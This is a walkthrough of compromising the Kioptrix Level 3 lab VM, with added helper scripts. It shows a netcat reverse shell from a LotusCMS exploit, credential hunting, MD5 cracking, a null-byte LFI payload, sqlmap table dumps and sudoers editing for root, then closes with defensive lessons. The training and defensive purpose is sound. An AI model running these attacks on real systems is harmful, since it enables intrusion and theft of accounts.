Kioptrix Level 3 without Metasploit (Vulnhub) Walkthrough
You can download the VM and practice from here
Step 1 : Set up the VMs (Kali Linux and Kioptrix Level 3)
On the Kali VM, network settings:
-> Tab ‘Adapter 1’: choose ‘NAT’ (internet access)
-> Tab ‘Adapter 2’: choose ‘Host-Only’ (lab network)
On the victim machine (Kioptrix Level 3):
-> Tab ‘Adapter 1’: choose ‘Host-Only’
Power on both the Kali machine and the victim machine.
Host-Only puts both VMs on the same isolated network. On Kali the Host-Only adapter (Adapter 2) shows up as eth1, so we discover the victim’s IP with ‘netdiscover -i eth1’.
Step 2 : Find the victim IP with netdiscover
Step 3 : Enumerate services on the target IP with nmap
The nmap scan shows two open ports: 22 (SSH) and 80 (HTTP). The HTTP banner also reports the PHP version (5.2.4), which matters later for the LFI.
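Steps 2 and 3 scripted, as an added example that is not part of the original walkthrough: run the version scan, then pull the open ports out of nmap’s grepable output so the next enumeration step can be driven from a list. The scan flags, the output file names and the sample .gnmap content are assumptions made for this example; the sample mirrors the ports and banners the walkthrough reports but is not real scan output.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.

# Full service/version scan of one host, saving nmap's normal, grepable and
# XML output as kioptrix3.{nmap,gnmap,xml}. Needs network access to the target.
scan_target() {
    nmap -sC -sV -p- -oA kioptrix3 "$1"
}

# Print "port/proto service" for every open port recorded in a .gnmap file.
# Grepable format: "Ports: 22/open/tcp//ssh//banner/, 80/open/tcp//http//banner/".
# Fields per entry: port/state/proto/owner/service/rpcinfo/version.
open_ports() {
    grep -h 'Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State:.*//' \
    | tr ',' '\n' \
    | awk -F/ '{ sub(/^[[:space:]]+/, "", $1) } $2 == "open" { print $1 "/" $3, $5 }'
}

# Constructed sample of grepable output (not a real scan); the banners mirror
# what the walkthrough reports: OpenSSH on 22 and Apache/PHP 5.2.4 on 80.
SAMPLE_GNMAP=$(mktemp)
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
printf 'Host: 192.168.56.106 ()\tPorts: %s\tIgnored State: closed (997)\n' \
    '22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1.2/, 80/open/tcp//http//Apache httpd 2.2.8 PHP 5.2.4/, 443/closed/tcp//https///' \
    > "$SAMPLE_GNMAP"

# Walk every open port; a real run would feed these into per-service tools.
open_ports "$SAMPLE_GNMAP" | while read -r port service; do
    echo "open: $port ($service)"
done
```

Against the lab box, `scan_target 192.168.56.106` followed by `open_ports kioptrix3.gnmap` gives the same two lines the walkthrough got by reading the nmap output by eye.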
Step 4 : Information gathering on port 80 (web service) with dirb, then look up LotusCMS exploits
To enumerate paths on the web server you can also use other tools such as gobuster, dirbuster or wfuzz.
The dirb results show several interesting paths, such as /phpmyadmin and /index.php. Let’s check them in the browser.
At /index.php we get a login page served by LotusCMS. I tried default credentials like admin:admin and root:root, but they did not work.
Searching for a LotusCMS exploit turned up a GitHub repository with a manual exploit script that its author ported from the Metasploit module. Details and download: https://github.com/Hood3dRob1n/LotusCMS-Exploit
Step 5 : Gain access
After cloning the repository, run:
./lotusRCE.sh TargetIP/
The script asks for the attacker IP and a listening port. Start a netcat listener in another terminal tab first, so it is already waiting for the connection back from the target:
nc -lvnp 5151
Attacker IP: 192.168.56.104, listening port: 5151
Choose option 1 (NetCat -e). The listener on port 5151 receives the connection, and running id shows that we are user www-data.
Upgrade to a proper TTY shell: python -c 'import pty; pty.spawn("/bin/bash")'
The prompt now shows $, but cd /root is denied: this user is unprivileged.
Under /home we find two more users, dreg and loneferret. In loneferret’s home directory we learn that this user is allowed to run the ht editor with sudo (sudo ht), but running it prompts for loneferret’s password, which we don’t have yet.
The website runs PHP, so let’s look for PHP files that contain the word password (the glob is quoted so the shell does not expand it):
find / -maxdepth 5 -name '*.php' -type f -exec grep -Hn password {} \; 2>/dev/null
The results show a MySQL password in /home/www/kioptrix3.com/gallery/gconfig.php. This is not loneferret’s password, but if it gets us into phpMyAdmin we may be able to read every user and password stored in the database.
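The credential hunt above as a reusable script, added here as an example that is not from the walkthrough: one function runs the same find/grep over a directory tree, a second reduces a PHP config to name=value pairs so the result can be reused without reading whole files. The directory layout, the variable names and the password in the sample gconfig.php are constructed for this example; the real file’s contents are not reproduced.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.

# Same idea as the find/grep one-liner, with the glob quoted so the shell does
# not expand *.php against the current directory. Case-insensitive, because
# configs use $DB_PASS, $password, 'dbpass' and so on.
find_php_creds() {   # find_php_creds ROOT -> file:line:text
    find "$1" -maxdepth 5 -type f -name '*.php' \
        -exec grep -Hn -iE 'pass|user' {} \; 2>/dev/null
}

# Reduce "$name = 'value';" lines in a PHP config to name=value pairs.
cred_values() {   # cred_values FILE
    Q="'\""   # both PHP quote styles
    grep -iE 'pass|user' "$1" \
    | sed -n "s/^[\$]\([A-Za-z_]*\)[[:space:]]*=[[:space:]]*[$Q]\([^$Q]*\)[$Q].*/\1=\2/p"
}

# Constructed web root: one config with credentials, one file without.
SAMPLE_ROOT=$(mktemp -d)
trap 'rm -rf "$SAMPLE_ROOT"' EXIT
mkdir -p "$SAMPLE_ROOT/gallery"
cat > "$SAMPLE_ROOT/gallery/gconfig.php" <<'EOF'
<?php
$db_host = 'localhost';
$db_user = 'gallery';
$db_pass = 'constructed-example-password';
?>
EOF
printf '<?php echo "hello"; ?>\n' > "$SAMPLE_ROOT/index.php"

find_php_creds "$SAMPLE_ROOT"
cred_values "$SAMPLE_ROOT/gallery/gconfig.php"
```

On the target, `find_php_creds /home/www` narrows the search to the web root instead of walking the whole filesystem, which is both faster and quieter.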
cat gconfig.php shows the database username and password.
Try username: root, password: fuckeyou on phpMyAdmin.
The config belongs to the gallery application, so click the gallery database.
Click the dev_accounts table (a likely place for usernames and passwords).
Click Browse: the table holds the password hashes of users dreg and loneferret.
Check the hash format with hash-identifier: it reports MD5.
Copy the hashes from phpMyAdmin into hash.txt and crack them with hashcat (-m 0 selects MD5, -a 0 is a straight dictionary attack):
hashcat -m 0 -a 0 ~/vulnhub/hash.txt /usr/share/wordlists/rockyou.txt
Show the cracked plaintexts by rerunning the same command with --show.
Now we know that user loneferret has the password: starwars
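What hashcat -m 0 is doing, as an added example that is not from the walkthrough: a plain dictionary attack on an unsalted MD5 with nothing but md5sum. The wordlist is constructed, and the target hash is assumed to be the MD5 of the password the walkthrough recovers (recompute it with printf '%s' starwars | md5sum if in doubt). The point is the one lesson 1 makes: an unsalted fast hash costs one md5 per guess, so a leaked table falls to any wordlist.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.

# Lower-case hex MD5 of a string (no trailing newline, which is how web apps
# usually hash passwords; "echo word | md5sum" would hash "word\n").
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Try every word in WORDLIST against HASH; print the match and return 0,
# return 1 if the wordlist is exhausted. Unsalted MD5 means one hash per
# candidate, so a few million guesses per second is easy even without hashcat.
crack_md5() {   # crack_md5 HASH WORDLIST
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_hex "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST=$(mktemp)
trap 'rm -f "$WORDLIST"' EXIT
printf '%s\n' password 123456 letmein starwars qwerty > "$WORDLIST"

# Assumed MD5 of "starwars" (verify: printf '%s' starwars | md5sum).
TARGET_HASH=5badcaf789d3d1d09794d8f021f40f0e

if cracked=$(crack_md5 "$TARGET_HASH" "$WORDLIST"); then
    echo "loneferret: $cracked"
else
    echo "no match in wordlist"
fi
```

With a salted, slow hash (bcrypt, scrypt, Argon2) the same loop would have to recompute a deliberately expensive function per guess and per user, which is what makes a dumped table survivable.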
Running sudo ht in the reverse shell fails with an error opening the terminal. Since nmap showed port 22 open, let’s log in over SSH instead.
After logging in via SSH, sudo ht still complains about the xterm-256color terminal type; the fix is to run export TERM=xterm first.
Now sudo ht opens with its menu bar: ‘File Edit Windows Help’.
Step 6 : Escalate to root by editing /etc/sudoers
Press F3 to open a file and enter the path /etc/sudoers.
ht runs as root, so it can write this file even though we are a low-privilege user. Add /bin/sh to the commands loneferret may run with sudo, then save.
Now sudo /bin/sh runs a shell as root.
Run sudo /bin/sh as loneferret: we have root.
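How to spot this privilege escalation path the moment sudo ht turns up, as an added example that is not from the walkthrough: parse what sudo -l reports, flag interactive editors (any editor running as root can rewrite /etc/sudoers, which is exactly what Step 6 does), and print the sudoers entry that turns sudo /bin/sh into a root shell. The sudo -l text below is constructed to resemble the Kioptrix output, not copied from it, and the exact sudoers line is my assumption about the edit the walkthrough makes inside ht.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.

# Read "sudo -l" output on stdin and print each command runnable as root,
# one per line. Negated entries ("!/usr/bin/su") are denials and are dropped.
sudo_root_cmds() {
    awk '/^[[:space:]]*\(root\)/ {
        sub(/^[[:space:]]*\(root\)[[:space:]]*/, "")
        sub(/^NOPASSWD:[[:space:]]*/, "")
        n = split($0, cmds, /,[[:space:]]*/)
        for (i = 1; i <= n; i++) if (cmds[i] !~ /^!/) print cmds[i]
    }'
}

# Interactive editors and pagers run as root are a write-any-file primitive.
flag_editors() {
    grep -E '/(ht|vi|vim|nano|emacs|ed|less|more)$' || true
}

# Sudoers entry (assumed form) that lets USER start CMD as root without a
# password. Validate the edited file with "visudo -c" before trusting it.
sudoers_line() {   # sudoers_line USER CMD
    printf '%s ALL=(root) NOPASSWD: %s\n' "$1" "$2"
}

# Constructed stand-in for what "sudo -l" prints for loneferret.
SAMPLE_SUDO_L='User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht'

echo "root-capable commands:"
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_root_cmds
echo "editors (arbitrary file write as root):"
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_root_cmds | flag_editors
echo "line to append to /etc/sudoers from inside ht:"
sudoers_line loneferret /bin/sh
```

On a real box, `sudo -l | sudo_root_cmds | flag_editors` is the one-liner; the `!/usr/bin/su` denial in the sample shows why a blacklist in sudoers buys nothing once an editor is allowed.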
Vulnerabilities found on the PHP website:
- Local File Inclusion (LFI) through the page parameter of index.php
- SQL injection in the gallery, which lets us list every database and table
1. Local File Inclusion (LFI)
We can read the system’s user list from /etc/passwd in the browser with http://example.com/index.php?page=../../../etc/passwd (see the OWASP Top 10 for background on this class of vulnerability).
Plain http://192.168.56.106/index.php?page=../../../etc/passwd did not work here, but appending a null byte (%00) returned the full user list. Any file readable by the web server can be pulled the same way, and LFI is often a stepping stone to code execution on the server.
Caution: this works because the nmap banner shows PHP 5.2.4. Null bytes in file paths are rejected from PHP 5.3.4 onwards, so the %00 trick fails on newer versions.
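The LFI check above as a script, added here as an example that is not from the walkthrough: probe one parameter with and without the trailing null byte and decide from the response body whether /etc/passwd came back. Everything below the two functions is constructed: fake_fetch stands in for curl and imitates a PHP < 5.3.4 page that appends a suffix to the parameter before including it, which is the behaviour the walkthrough observed (plain traversal fails, %00 succeeds). Against a real target, call lfi_probe with the base URL and the parameter name only, so curl is used.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.

# True if the body looks like /etc/passwd (root entry on its own line).
looks_like_passwd() {
    printf '%s\n' "$1" | grep -q '^root:x:0:0:'
}

# Request BASE?PARAM=<traversal> twice, without and with a trailing %00, and
# report which form leaks the file. FETCH (default: curl -s) must print the
# response body for the URL it is given.
lfi_probe() {   # lfi_probe BASE_URL PARAM [FETCH]
    base=$1; param=$2; fetch=${3:-"curl -s"}
    for payload in '../../../etc/passwd' '../../../etc/passwd%00'; do
        body=$($fetch "${base}?${param}=${payload}")
        if looks_like_passwd "$body"; then
            printf 'VULNERABLE %s\n' "$payload"
        else
            printf 'no %s\n' "$payload"
        fi
    done
}

# Constructed fake server: behaves like include($_GET['page'] . '.php') on
# PHP < 5.3.4, where %00 ends the C string and cuts the appended suffix off.
fake_fetch() {
    case $1 in
        *etc/passwd%00)
            printf 'root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33:www-data:/var/www:/bin/sh\n' ;;
        *)
            printf '<html>Warning: include(../../../etc/passwd.php): failed to open stream</html>\n' ;;
    esac
}

lfi_probe 'http://192.168.56.106/index.php' page fake_fetch
```

Three levels of ../ are enough because the include is relative to the web root; if a target sits deeper, add more, since extra ../ past / are harmless.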
2. SQL injection with sqlmap to dump the usernames and passwords
The dirb scan also showed /gallery, the same folder where we found the config file. Navigate to 192.168.56.106/gallery/: the images are broken, and hovering over Photo_Shoot shows that the links point to the hostname kioptrix3.com (e.g. kioptrix3.com/gallery/p.php/5), which does not resolve.
Edit /etc/hosts (vim /etc/hosts) and add a line with the victim IP and the hostname kioptrix3.com.
Then restart the browser and open kioptrix3.com/gallery.
Now the images load.
Clicking through the links to find an injectable page, the ‘Ligoat Press Room’ page has sorting options.
After choosing ‘Photo Id’, the page displays the SQL sort clause in the browser.
That tells us the parameter reaches the database unsanitized. Save the request from Burp Suite (right click, ‘Save to file’) as ‘sqli1’.
vim sqli1 and change id=1 to id=1*, so that sqlmap tests exactly that parameter when given the file.
We already know the database is named gallery from the browser. Listing its tables with sqlmap reveals dev_accounts, which should hold usernames and passwords.
Finally, dump the dev_accounts table from the gallery database.
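Preparing the saved request for sqlmap, as an added example that is not from the walkthrough: list the query parameters in the saved Burp request, append sqlmap’s * injection marker to the chosen one, and print the enumeration commands the walkthrough runs. The exact sqlmap arguments are not on the page, so the -r/-D/-T flags shown are my assumption about how it was done, and the request file below is constructed rather than the author’s sqli1.

```shell
#!/bin/sh
# Added example, not code from the original walkthrough.

# Parameter names from the query string on the request line of a saved
# HTTP request (the format Burp's "Save to file" writes).
request_params() {   # request_params FILE
    sed -n '1s/^[A-Z]* [^?]*?\([^ ]*\) .*/\1/p' "$1" | tr '&' '\n' | cut -d= -f1
}

# Copy of the request with sqlmap's custom injection marker appended to
# PARAM's value (id=1 -> id=1*), so sqlmap -r tests only that spot.
mark_injection_point() {   # mark_injection_point FILE PARAM  (writes to stdout)
    sed "s/\([?&]$2=[^& ]*\)/\1*/" "$1"
}

# The enumeration sequence the walkthrough follows; flags are assumed, not
# copied from the page. Run from the directory holding the marked request.
sqlmap_commands() {   # sqlmap_commands REQUEST_FILE
    cat <<EOF
sqlmap -r $1 --batch --dbs
sqlmap -r $1 --batch -D gallery --tables
sqlmap -r $1 --batch -D gallery -T dev_accounts --dump
EOF
}

# Constructed request resembling what Burp saves; not the author's sqli1.
REQ=$(mktemp)
trap 'rm -f "$REQ" "$REQ.marked"' EXIT
cat > "$REQ" <<'EOF'
GET /gallery/gallery.php?id=1&sort=photoid HTTP/1.1
Host: kioptrix3.com
User-Agent: Mozilla/5.0
Connection: close

EOF

echo "parameters: $(request_params "$REQ" | tr '\n' ' ')"
mark_injection_point "$REQ" id > "$REQ.marked"
head -n 1 "$REQ.marked"
sqlmap_commands "$REQ.marked"
```

Keeping the Host header in the saved request matters here: sqlmap sends it as-is, and after the /etc/hosts edit kioptrix3.com is what makes the gallery pages render.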
Lessons learned:
1. Password reuse between the database, sudo and SSH login: each account should have its own strong password, stored with a slow salted hash (not unsalted MD5), and SSH should use key-based authentication instead of passwords.
2. Improper privilege management: letting a non-privileged user run an editor as root (sudo ht) is the same as giving them write access to every file, including /etc/sudoers. Grant sudo only for specific, non-interactive commands, and edit sudoers only through visudo. (The sticky bit does not help here: it applies to directories and only restricts deleting or renaming other users’ files; it does not stop an editor running as root from rewriting a file.)
3. The backend must validate input and never pass URL parameters straight into file includes or SQL queries; that is what makes the LFI and SQL injection possible. Use an allow-list of includable pages and parameterized queries.
4. Exposed administrative interface: phpMyAdmin was reachable from the network, and the database root credentials sat in a config file readable by the web server user, so anyone with a shell as www-data could read the whole database. Restrict phpMyAdmin to trusted hosts, give the application a least-privilege database account, and keep credentials out of world-readable files.